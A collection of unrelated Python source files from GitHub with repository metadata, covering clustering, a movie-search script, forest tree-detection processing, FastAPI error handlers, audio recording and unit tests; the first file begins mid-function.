if name[-4:] != suffix: name += suffix # create the file name path = os.path.join(folder, name) # save data to folder with name with open(path, "w") as f: writer = csv.writer(f, lineterminator='\n') writer.writerows(data) except Exception(e): logging.error('[{}] : {}'.format(sys._getframe().f_code.co_name,e)) def calculate_hellinger_distance(p, q): """ Calculate the hellinger distance between two probability distributions note that the hellinger distance is symmetrical, so distance p and q = q and p other measures, such as KL-divergence, are not symmetric but can be used instead Parameters ----------- p : list or array first probability distribution q : list or array 
second probability distribution Returns -------- hellinger_dinstance : float hellinger distance of p and q """ return np.sqrt(np.sum((np.sqrt(p) - np.sqrt(q)) ** 2)) / np.sqrt(2) def calc_cosine(vec_a, vec_b): return cosine_similarity([vec_a], [vec_b])[0][0] def read_vectors(file): attract_repel_skills = pd.read_csv(file, sep=" ", header=None) attract_repel_skills['vector'] = attract_repel_skills[attract_repel_skills.columns[1:]].values.tolist() attract_repel_skills.rename(columns={0:'id'}, inplace=True) attract_repel_skills = attract_repel_skills[['id', 'vector']].set_index('id') return attract_repel_skills
stannida/skill-embeddings
utils/helper_functions.py
helper_functions.py
py
3,147
python
en
code
1
github-code
36
14487480169
import urllib.request, urllib.parse from difflib import SequenceMatcher import json from msvcrt import getch serviceurl = 'http://www.omdbapi.com/?' apikey = '&apikey='+'da05069b' abv90=[] def match(s1, s2): s2p=s2[0:len(s1)] s1p=''.join(d for d in s1 if d.isalnum()) s2p=''.join(d for d in s2p if d.isalnum()) print("\n"+s1p+"--->"+s2p+"\n") return SequenceMatcher(None, s1p, s2p ).ratio()*100 def search_movie(search): if len(search) < 1: return None try: url = serviceurl + urllib.parse.urlencode({'s': search})+apikey print(f'Retrieving the data of "{search}" now... \n') uh = urllib.request.urlopen(url) print(url+"\n") data = uh.read() json_data=json.loads(data) # list_keys=['Title', 'Year', 'Rated', 'Released', 'Runtime', 'Genre', 'Director', 'Writer', # 'Actors', 'Plot', 'Language', 'Country', 'Awards', 'Ratings', # 'Metascore', 'imdbRating', 'imdbVotes', 'imdbID'] if json_data['Response']=='True': for k in json_data["Search"]: print(k['Title']) for k in json_data["Search"]: print("Similarity "+str(match(str(k['Title']),fn))) if match(str(k['Title']),fn)>=90.0: abv90.append(str(k['Title'])) except Exception as e: print(f"ERROR: {e}") search = input('\nEnter: ') fn=input("\nEnter filename\n") search_movie(search) print("Most similar..\n") for i in abv90: print(i) getch()
souvikchakraborty98/QuickScripts
z_test_1.py
z_test_1.py
py
1,554
python
en
code
0
github-code
36
14072972599
import player def get_player_details(): # Fill the code for getting user inputs and creating the card object name=input("Enter the Player Name :") matches=int(input("Enter the No of Matches Played:")) player_obj=player.Player(name,matches) return player_obj player_obj = get_player_details() no_of_matches_won = int(input("Enter the No of Matches Won:")) # Fill the code here for invoking the calculate_points() and find_status_category() player_obj.calculate_points(no_of_matches_won) player_obj.find_status_category() print("Status Category:", player_obj.get_status_category())
vivek0807/AllCodes
Python/main.py
main.py
py
607
python
en
code
1
github-code
36
74792104104
# this is not CURE, just heirarchical clustering # this is used to practice making a clustering algorithm import numpy as np import matplotlib.pyplot as plt import math # a vertex is just an x position and a y position # this makes is easier for grouping vertices together # rather than having 2 arrays for the x and y positions I can have 1 array with the x and y positions together # I could have just used tuples or something but I prefer to have my own class class Vertex: def __init__(self, _x=0, _y=0): self.x = _x self.y = _y def __repr__(self): return f"({self.x}, {self.y})" # A Cluster is an array of vertices, a centroid, and a radius # this makes it easier than having a multi-dimensional array of vertices # each cluster can easily calculate its own centroid class Cluster: def __init__(self, _vertices=[]): self.vertices = _vertices self.centroid = Vertex() self.calc_centroid() self.radius = self.calc_radius() def __repr__(self): return str(self.vertices) def calc_centroid(self): x_sum = 0 y_sum = 0 for c in self.vertices: x_sum += c.x y_sum += c.y self.centroid = Vertex(x_sum/len(self.vertices), y_sum/len(self.vertices)) def calc_radius(self): radius = 0 for v in self.vertices: distance = euclidean_distance(v, self.centroid) if distance > radius: radius = distance return radius class Entry: def __init__(self, key, val): self.key = key self.value = val # i had to make my own map structure # because the map given by python wasn't what I was looking for class ClusterMap: def __init__(self): self.entries = [] def getValue(self, key): # get the value at the key for e in self.entries: if e.key == key: return e.value def add(self, key, value): # adds a new key value pair if not self.contains(key): self.entries.append(Entry(key, value)) def contains(self, key): for e in self.entries: if e.key == key: return True return False def set(self, key, value): # updates the value for a given key if not self.contains(key): self.add(key, value) return for e in self.entries: if 
e.key == key: e.value = value break # calculates the number of vertices in a list of clusters def num_vertices(clusters): count = 0 for c in clusters: count += len(c.vertices) return count # concatenates 2 clusters and returns the new cluster def concat_clusters(c1, c2): vertices = c1.vertices + c2.vertices return Cluster(vertices) # calculates the euclidean distance between 2 vertices def euclidean_distance(v1, v2): dx = abs(v2.x-v1.x) dy = abs(v2.y-v1.y) return math.sqrt(dx**2 + dy**2) # draws a graph with x and y values def draw_graph(clusters): x, y = get_raw_xy(clusters) # print(x) # print(y) fig, ax = plt.subplots() for cluster in clusters: _x = cluster.centroid.x _y = cluster.centroid.y circle = plt.Circle((_x, _y), cluster.radius+1, color='blue', fill=False) ax.add_patch(circle) ax.set_ylim(1,100) ax.set_xlim(1,100) ax.plot(x, y, 'o', color='black') plt.show() # gets the raw x and y data as their own lists from a list of clusters def get_raw_xy(clusters): x = [] y = [] for c in clusters: for v in c.vertices: x.append(v.x) y.append(v.y) return x, y # not currently used by the algorithm def f(avg, density): a = 0.2 return a - ((-avg/density)+1)*a # not currently used by the algorithm def calc_density(cluster): max_x, max_y = 0 min_x, min_y = math.inf for vertex in cluster: if vertex.x > max_x: max_x = vertex.x if vertex.y > max_y: max_y = vertex.y if vertex.x < min_x: min_x = vertex.x if vertex.y < min_y: min_y = vertex.y x = max_x - min_x y = max_y - min_y area = x * y density = len(cluster.vertices) / area return density # print information about the clusters def print_clusters(clusters): print(f'Cluster Count: {len(clusters)}') print(f'Vertex Count: {num_vertices(clusters)}') for c in clusters: for v in c.vertices: print(v, end='') print('\n') # returns a random set of vertices as an x array and a y array def random_vertices(count): x = np.random.randint(low=1, high=100, size=count) y = np.random.randint(low=1, high=100, size=count) return x, y # this will 
return vertices that are very obviously have their own clusters # only used for debugging purposes def cluster_test_vertices(count): vertices = int(count/4) lowest_low = 5 highest_low = 25 lowest_high = 75 highest_high = 95 x0 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) y0 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) x1 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) y1 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) x2 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) y2 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) x3 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) y3 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) x = np.concatenate((x0, x1, x2, x3), axis=0) y = np.concatenate((y0, y1, y2, y3), axis=0) return x, y # this is the main heirarchical clustering algorithm def hierarchical_clustering(vertex_count, goal_cluster_count): # generates random x and y values for the vertices x, y = random_vertices(vertex_count) # x, y = cluster_test_vertices(vertex_count) # static data for debugging purposes # x = [12, 9, 18, 70, 75, 85, 30, 60, 70, 20] # y = [60, 70, 66, 80, 77, 85, 50, 20, 22, 20] clusters = [] # the list of the clusters # make clusters out of the randomly generated x and y values for i in range(vertex_count): v = Vertex(x[i], y[i]) cluster = Cluster([v]) clusters.append(cluster) # num_clusters is the number of clusters that has been created by the algorithm # it is first equal to the size of the array becasue each vertex is originally its own cluster num_clusters = len(clusters) # this is the main algorithm and it will loop until the goal number of clusters has been reached # basically it works by finding the closest cluster for every cluster # then the algorithm puts all the closest pairs into map data structure # then it loops over the map and finds the pair of clusters that 
are closest to each other # it combines those clusters into a new cluster, deletes the old clusters and appends the new cluster # this is about the slowest way to do this but it actually works really well while num_clusters > goal_cluster_count: c_map = ClusterMap() # a cluster map will map a cluster to its closest neighbor # find all the closest points and add them to the map for i in range(len(clusters)): nearest_neighbor_distance = math.inf for j in range(len(clusters)): if i != j: # so a cluster doesn't consider itself as its closest neighbor distance = euclidean_distance(clusters[i].centroid, clusters[j].centroid) if distance < nearest_neighbor_distance: nearest_neighbor_distance = distance c_map.set(clusters[i], clusters[j]) closest_pair = 0 # index of closest pair closest_pair_distance = math.inf # loops over all the entries and finds the closest pair of clusters for i in range(len(c_map.entries)): e = c_map.entries[i] distance = euclidean_distance(e.key.centroid, e.value.centroid) if distance < closest_pair_distance: closest_pair = i closest_pair_distance = distance # make a new cluster, delete the old ones, and add the new one closest_clusters = c_map.entries[closest_pair] new_cluster = concat_clusters(closest_clusters.key, closest_clusters.value) clusters.remove(closest_clusters.key) clusters.remove(closest_clusters.value) clusters.append(new_cluster) num_clusters = len(clusters) # print(f'len clusters: {len(clusters)}') # print_clusters(clusters) draw_graph(clusters) def main(): count_vertices = 100 desired_cluster_count = 30 hierarchical_clustering(count_vertices, desired_cluster_count) if __name__ == "__main__": main()
AdamPoper/CPSC-480-CURE-Clustering
heirarchical_clustering.py
heirarchical_clustering.py
py
9,062
python
en
code
0
github-code
36
12248576934
###################################################################### # Script for processing Diss. # # (C) Christoph Schaller, BFH ###################################################################### import os import sys import math import glob import numpy as np import fiona from shapely.geometry import Point, box from osgeo import ogr PYFINT_HOME = os.environ.get("PYFINT_HOME") sys.path.append(PYFINT_HOME) from pyfintcontroller import * FINTCH_HOME = os.environ.get("FINTCH_HOME") sys.path.append(os.path.join(FINTCH_HOME,"Common")) from fintch_utilities import * import numpy as np import pandas as pd import geopandas as gpd from osgeo import ogr, osr, gdal import psycopg2 from shapely.wkt import dumps, loads import configparser from datetime import datetime, date, time, timedelta import time from multiprocessing import Process, Pool, Queue, JoinableQueue, current_process, freeze_support from queue import Empty import logging import traceback import fintch_processing_core_pub def worker(q, work_function, cfg): db_connection = psycopg2.connect(host=cfg.get("AP07__db","host"), dbname=cfg.get("AP07__db","dbname"), user=cfg.get("AP07__db","user"), password=cfg.get("AP07__db","password")) configure_log(cfg) current_forest_mask_path = None current_trasse_mask_path = None forest_mask_df = None while True: #Consume work as long as there are items in the queue try: flaeche_record = q.get() if flaeche_record == None: q.task_done() print("Queue End") break if "waldmaske" in flaeche_record and flaeche_record["waldmaske"] != None and flaeche_record["waldmaske"] != "" : if flaeche_record["waldmaske"] != current_forest_mask_path: current_forest_mask_path = flaeche_record["waldmaske"] forest_mask_df = gpd.read_file(current_forest_mask_path) flaeche_record["waldmaske_df"] = forest_mask_df if "trasse_maske" in flaeche_record and flaeche_record["trasse_maske"] != None and flaeche_record["trasse_maske"] != "": if flaeche_record["trasse_maske"] != current_trasse_mask_path: 
current_trasse_mask_path = flaeche_record["trasse_maske"] trasse_mask_df = gpd.read_file(current_trasse_mask_path) flaeche_record["trasse_mask_df"] = trasse_mask_df work_function(flaeche_record,db_connection) q.task_done() except Empty: print("Queue empty") break #No more work available print("Exit:",current_process()) db_connection.close() return def process_record_setup(parameter_sets, reference_plot_df, flaeche_id_column, flaeche_info_df, veg_zone_df, dhm, plot_radius, process_function, table_schema, table_base_name, cfg, result_base_path, log_path, num_processes = 1): # Create queues records = [] for i,plot in reference_plot_df.iterrows(): flaeche = flaeche_info_df[flaeche_info_df["Flaeche_ID"]==plot[flaeche_id_column]].iloc[0] if flaeche["VHM"]!=flaeche["VHM"]: # False if values is nan # Info needed for processing not present -> skip plot continue vhm_path = flaeche["VHM"] plot_center_geom = plot.geometry x = plot_center_geom.x y = plot_center_geom.y plot_area_geom = plot_center_geom.buffer(plot_radius, resolution=16) perimeter_record = { "parameter_sets": parameter_sets, "perimeter_id": plot["OBJECTID"], "geom_center":plot_center_geom, "geom_flaeche":plot_area_geom, "vhm_input_file": vhm_path, "geometry": plot_center_geom, "flaeche_id": int(plot["plot_id"] if plot["plot_id"]>0 else int(plot["OBJECTID"])), "quelle_id": plot["source_id"], "result_base_path": result_base_path, "log_path": log_path, "plot_radius" : 12.62, "perimeter_buffer" : 37.5, "grid_step": 25, "perimeter_buffer2" : 75, "grid_step2" : 50, "r_max" : cfg.getfloat("AP07__pyfint","r_max"), "epsg" : cfg.get("AP07__pyfint","epsg"), "crs" : {'init': "epsg:"+cfg.get("AP07__pyfint","epsg")}, "table_schema": table_schema, "table_base_name": table_base_name, "mischungsgrad": flaeche["Mischungsgrad"], "vhm_input_file_150": flaeche["VHM_150"], "waldmaske": flaeche["Waldmaske"], "veg_zones": veg_zone_df, "dhm": dhm } records.append(perimeter_record) return records def process_records(process_records, 
process_function, num_processes = 1): # Create queues perimeter_queue = JoinableQueue() #Insert records into queue for r in process_records: perimeter_queue.put(r) #Create and start worker processes processes = [] for i in range(num_processes): perimeter_queue.put(None) proc = Process(target=worker, args=(perimeter_queue,process_function,cfg,)) processes.append(proc) print("Start: ",proc) proc.start() perimeter_queue.join() # for p in processes: # if p.exitcode == None: # p.terminate() print("Processing finished") def process_records_linear(process_records, process_function, num_processes = 1): # Create queues perimeter_queue = JoinableQueue() #Insert records into queue for r in process_records: perimeter_queue.put(r) # break print("Start:") worker(perimeter_queue,process_function,cfg) print("Processing finished") def configure_log(cfg): log_path = cfg.get("AP07__fintch_processing_paths","log_path") logfile_info_path = os.path.join(log_path, current_process().name+"_info.log") logfile_error_path = os.path.join(log_path, current_process().name+"_error.log") log_format = "%(asctime)s; %(processName)s; %(levelname)s; %(name)s; %(message)s" # comment this to suppress console output stream_handler = logging.StreamHandler() file_handler_info = logging.FileHandler(logfile_info_path, mode='w') file_handler_info.setLevel(logging.INFO) file_handler_error = logging.FileHandler(logfile_error_path, mode='w') file_handler_error.setLevel(logging.ERROR) logging.basicConfig( level=logging.INFO, format=log_format, handlers=[ stream_handler, file_handler_info, file_handler_error ]) sys.stdout = LogFile('stdout') sys.stderr = LogFile('stderr') # Default entry point if __name__ == "__main__": start_time = time.time() #Setup detection path_to_config_file = os.environ['FINTCH_CONFIG_HOME'] ini_config_file = os.path.join(path_to_config_file, "FINTCH_config.ini") cfg = configparser.ConfigParser() cfg._interpolation = configparser.ExtendedInterpolation() cfg.read(ini_config_file) 
result_base_path = r"F:\fint-ch\Geodaten\diss\Results" log_path = os.path.join(result_base_path, "procesing_log") flaechen_info_path = r"F:\fint-ch\Geodaten\diss\kantone_info.csv" reference_plot_path = r"F:\fint-ch\Geodaten\diss\reference_plots.shp" flaeche_id_column = "KANTONSNUM" dhm_path = r"E:\GIS_Projekte\Geodaten\DHM25\TIFF\dhm25_grid_raster.tif" veg_zone_gdb_path = r"F:\fint-ch\Geodaten\diss\Vegetationshöhenstufen_BAFU\veg_zones.gdb" veg_zone_table = "Vegetationshoehenstufen_1995" plot_radius = 25 reference_plot_df = gpd.read_file(reference_plot_path) flaeche_info_df = pd.read_csv(flaechen_info_path, delimiter=";") veg_zone_df = gpd.read_file(veg_zone_gdb_path, layer=veg_zone_table) ensure_dir(result_base_path) ensure_dir(log_path) truncate = True configure_log(cfg) table_schema = "fintch" table_base_name = "diss" table_owner = "geoserver" db_connection = psycopg2.connect(host=cfg.get("AP07__db","host"), dbname=cfg.get("AP07__db","dbname"), user=cfg.get("AP07__db","user"), password=cfg.get("AP07__db","password")) srid = cfg.get("AP07__pyfint","epsg") fintch_processing_core_pub.create_db_tables(table_schema,table_base_name,table_owner,srid,db_connection) parameter_sets = { 1 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":"", "gauss_size":"", "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 2 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":"", "gauss_size":"", "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 3 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, 
"gauss_sigma":"", "gauss_size":"", "resize_method":"bilinear", "resize_resolution":2, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 4 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":1, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 5 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":1, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 6 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":1, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 7 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 8 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 9 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", 
"postprocessing":""}, 10 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":3, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 11 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":3, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 12 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":3, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 13 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 14 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 15 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, } #prepare jobs/job records records = process_record_setup(parameter_sets, reference_plot_df, 
flaeche_id_column, flaeche_info_df, veg_zone_df, dhm_path, plot_radius, fintch_processing_core_pub.process_perimeter_dem, table_schema, table_base_name, cfg, result_base_path, log_path, num_processes = 1) #process perimeter (FST, Vegetation Zones, Terrain) process_records(records,fintch_processing_core_pub.process_perimeter, num_processes = 20) #process detection process_records(records,fintch_processing_core_pub.process_detection, num_processes = 40) #process detection with Eysn LM + Filter preprocessing/parameterset_id:30 process_records(records,fintch_processing_core_pub.process_detection_eysn_lm_filter, num_processes = 40) #process detection with Kaartinen FGI_LOCM without Watershed/parameterset_id:31 process_records(records,fintch_processing_core_pub.process_detection_kaartinen_fgi_locm, num_processes = 40) db_connection.close() print("TOTAL PROCESSING TIME: %s (h:min:sec)" % str(timedelta(seconds=(time.time() - start_time))))
HAFL-WWI/FINTCH-publication-code
2022-improving-local-maxima-idt/python/detection/Processing/fintch_processing_process_pub.py
fintch_processing_process_pub.py
py
14,644
python
en
code
0
github-code
36
40571855871
import unittest import os import shutil from ls import get_dir_files, get_dir_files_count, get_file_contents, get_file_line_count from .stubs import create_temp_file, get_test_file_path, TEST_DIR_PATH, TEST_SUBDIR_PATH class TestFilesHelpers(unittest.TestCase): def setUp(self): os.mkdir(TEST_DIR_PATH) create_temp_file(get_test_file_path('a.md'), 'hello') create_temp_file(get_test_file_path('b.md'), 'world') os.mkdir(TEST_SUBDIR_PATH) create_temp_file(get_test_file_path('c.md', is_subdir=True), 'hello world') def assert_array_equal(self, a, b): for element in a: self.assertIn(element, b) self.assertEqual(len(a), len(b)) def test_non_recursive_get_dir_files(self): files = get_dir_files(TEST_DIR_PATH, recursive=False) files_names = [file.name for file in files] expected_files = ['a.md', 'b.md', 'temp_testsubdir'] self.assert_array_equal(expected_files, files_names) def test_recursive_get_dir_files(self): files = get_dir_files(TEST_DIR_PATH, recursive=True) files_names = [file.name for file in files] expected_files = ['a.md', 'b.md', 'temp_testsubdir', 'c.md'] self.assert_array_equal(expected_files, files_names) def test_get_file_contents(self): paths = [ get_test_file_path('a.md'), get_test_file_path('b.md'), get_test_file_path('c.md', is_subdir=True), ] expected_files_contents = ['hello', 'world', 'hello world'] files_contents = [get_file_contents(path) for path in paths] # Should only be one-lined files for file_contents in files_contents: self.assertTrue(len(file_contents), 1) # Only keep the first line to reuse the helper files_contents = [lines[0] for lines in files_contents] self.assert_array_equal(expected_files_contents, files_contents) def test_get_file_line_count(self): path = get_test_file_path('a.md') file_line_count = get_file_line_count(path) expected_lines_count = 1 self.assertEqual(file_line_count, expected_lines_count) def test_get_dir_files_count(self): folder_files_count = get_dir_files_count(TEST_SUBDIR_PATH) expected_folder_files_count = 1 
self.assertEqual(folder_files_count, expected_folder_files_count) def tearDown(self): shutil.rmtree(TEST_DIR_PATH) if __name__ == '__main__': unittest.main()
eveningkid/ls
tests/test_file_helpers.py
test_file_helpers.py
py
2,551
python
en
code
0
github-code
36
72549427943
import traceback from fastapi import HTTPException, Request from fastapi.exceptions import RequestValidationError from starlette.exceptions import HTTPException as StarletteHTTPException from starlette.responses import JSONResponse from tortoise.exceptions import IntegrityError from config import config from utils.patch import MyFastAPI app = MyFastAPI.get_app() class BadRequest(HTTPException): def __init__(self, message: str = 'Bad Request'): super().__init__(400, message) class ValidationError(BadRequest): def __init__(self, message: str = 'Validation Error'): super().__init__(message) class Forbidden(HTTPException): def __init__(self, message: str = 'Forbidden'): super().__init__(403, message) class NotFound(HTTPException): def __init__(self, message: str = 'Not Found'): super().__init__(404, message) @app.exception_handler(IntegrityError) async def integrity_error_handler(request, exception: IntegrityError): raise BadRequest(str(exception)) @app.exception_handler(RequestValidationError) async def validation_error_handler(request: Request, exception: RequestValidationError): message = '' errors = exception.errors() for error in errors: message += f'{".".join(error["loc"])} {error["msg"]}\n' return JSONResponse( content={'message': message.rstrip(), 'detail': errors}, status_code=400 ) @app.exception_handler(StarletteHTTPException) async def http_exception_handler(request, exception: StarletteHTTPException): return JSONResponse( status_code=exception.status_code, content={'message': exception.detail}, ) @app.exception_handler(Exception) async def internal_server_error_handler(request, exception: Exception): return JSONResponse( status_code=500, content={ 'message': str(exception), 'detail': traceback.format_exc().split('\n') if config.debug else '' }, )
OpenTreeHole/treehole_backend
utils/exceptions.py
exceptions.py
py
1,981
python
en
code
0
github-code
36
19544626210
# pip install pipwin # pip install pyaudio import pyaudio import wave from datetime import datetime, timedelta import numpy as np from multiprocessing import shared_memory def runCapture(recDevice, rec_controls_sm, saveFilesPath, SECONDS = 1): rec_controls = rec_controls_sm.buf p = pyaudio.PyAudio() micName = p.get_device_info_by_host_api_device_index(0, recDevice).get('name') RATE = 44100 # 14700/second 44100/ 3secs #SECONDS = 1 # ? multiple of RATE CHUNK = int(RATE * SECONDS) # 44100 # 14700/second 44100/ 3secs ? 44100/30 = 1470 FORMAT = pyaudio.paInt16 FORMATstr = "pyaudio.paInt16" # pyaudio.paInt16 format, the samples are 16-bit integers, so their range is from -32,768 to 32,767. CHANNELS = 1 stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK, input_device_index=recDevice) data_chunks = [] # shared script for recording data_stamps = [] waitLoop = True stopStamp = 0.0 while waitLoop: stamp = datetime.timestamp(datetime.now()) # frame reading is embedded in stream.read(CHUNK..... 
no for loop data_stamps.append(datetime.timestamp(datetime.now())) #data_chunks.append(stream.read(CHUNK, exception_on_overflow=False)) data_chunks.append(stream.read(CHUNK)) # shared script for recording if rec_controls[0] == 0: if stopStamp == -1 and rec_controls[1] != 99: nowTime = datetime.now() stopStamp = datetime.timestamp(nowTime) newSecond = rec_controls[1] - nowTime.second if newSecond < 0: # adjust for wrap around the clock 1 - 58 = -57 newSecond += 60 stopStamp = stopStamp + timedelta(seconds = (newSecond)) elif stamp > stopStamp: waitLoop = False stream.stop_stream() stream.close() p.terminate() wf = wave.open(saveFilesPath + "\\audio_" + str(recDevice) + ".wav", 'wb') wf.setnchannels(1) # CHANNELS wf.setsampwidth(p.get_sample_size(FORMAT))#data_chunks[-1].get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(data_chunks)) wf.close() audFrames = [] for data in data_chunks: #print(len(data)) numpyData = np.frombuffer(data, dtype=np.int16) audFrames.append(numpyData) audFrames = np.array(audFrames, dtype=np.int16) audFrames.tofile(saveFilesPath + "\\audioNpInt16_" + str(recDevice) + ".bin") #audFrames = [] #for data in data_chunks: # print(len(data)) # numpyData = np.frombuffer(data, dtype=np.float) # audFrames.append(numpyData) #audFrames = np.array(audFrames) #audFrames.tofile(saveFilesPath + "\\audioNpFloat_" + str(recDevice) + ".bin") data_raw = np.array(data_chunks) data_raw.tofile(saveFilesPath + "\\audioFramesRaw_" + str(recDevice) + ".bin") #data_chunks = data_chunks.astype(np.int16) #print('audio raw', data_raw.dtype, np.shape(data_raw)) data_stamps = np.array(data_stamps, dtype=float)#, dtype=np.longdouble) #print("audio stampss:", len(data_stamps), data_stamps[0], data_stamps[-1], recDevice, " micName: ", micName) data_stamps.tofile(saveFilesPath+"\\audioStamps_" + str(recDevice) + ".csv", sep = ',') lines = ['RATE:' + str(RATE), 'SECONDS:' + str(SECONDS), 'CHUNK:' + str(CHUNK), "FORMAT:" + FORMATstr]#str(FORMAT)] 
lines.append('rawType:' + str(data_raw.dtype)) lines.append('rawShape:' + str(np.shape(data_raw))) print('audio', len(data_stamps), lines, micName) with open(saveFilesPath + "\\audioStats_" + str(recDevice) + ".txt", "w") as fhandle: for line in lines: fhandle.write(f'{line}\n') return
Richard-Kershner/Audio-Video-Screen-TimeStamp-Recorder
rec_audio.py
rec_audio.py
py
4,034
python
en
code
0
github-code
36
28630475186
from densefog import web import flask # noqa from icebox.model.iaas import image as image_model def describe_images(): params = web.validate_request({ 'type': 'object', 'properties': { 'limit': { 'type': 'integer', 'minimum': 1, 'maximum': 100, }, 'offset': {'type': 'integer', 'minimum': 0}, 'reverse': {'type': 'boolean'}, 'searchWord': {'type': ['string', 'null']}, 'isPublic': {'type': 'boolean'}, 'status': { 'type': 'array', 'items': { 'type': 'string', 'enum': [ image_model.IMAGE_STATUS_PENDING, image_model.IMAGE_STATUS_ACTIVE, image_model.IMAGE_STATUS_DELETED, image_model.IMAGE_STATUS_CEASED, image_model.IMAGE_STATUS_ERROR, ], }, 'minItems': 0, 'maxItems': 20, 'uniqueItems': True }, 'imageIds': { 'type': 'array', 'items': { 'type': 'string' }, 'minItems': 0, 'maxItems': 20, 'uniqueItems': True } } }) project_id = flask.request.project['id'] image_ids = params.get('imageIds', None) search_word = params.get('searchWord', None) status = params.get('status', None) is_public = params.get('isPublic', False) offset = params.get('offset', 0) limit = params.get('limit', 20) reverse = params.get('reverse', True) page = image_model.limitation( project_ids=[project_id], image_ids=image_ids, is_public=is_public, offset=offset, status=status, limit=limit, search_word=search_word, reverse=reverse) formated = { 'limit': page['limit'], 'offset': page['offset'], 'total': page['total'], 'imageSet': [] } for image in page['items']: formated['imageSet'].append(image.format()) return formated @web.mark_user_operation('image', 'imageIds') def delete_images(): params = web.validate_request({ 'type': 'object', 'properties': { 'imageIds': { 'type': 'array', 'items': { 'type': 'string' }, 'minItems': 0, 'maxItems': 20, 'uniqueItems': True } }, 'required': ['imageIds'] }) project_id = flask.request.project['id'] image_ids = params['imageIds'] image_model.delete(project_id, image_ids) return { 'imageIds': image_ids } @web.mark_user_operation('image', 'imageId') def 
modify_image_attributes(): params = web.validate_request({ 'type': 'object', 'properties': { 'imageId': {'type': 'string'}, 'name': {'type': 'string', 'maxLength': 50}, 'description': {'type': 'string', 'maxLength': 250} }, 'required': ['imageId'] }) project_id = flask.request.project['id'] image_id = params.get('imageId') name = params.get('name', None) description = params.get('description', None) image_model.modify(project_id, image_id, name=name, description=description) return { 'imageId': image_id }
hashipod/icebox
core/icebox/api/public/image.py
image.py
py
3,641
python
en
code
0
github-code
36
12553211459
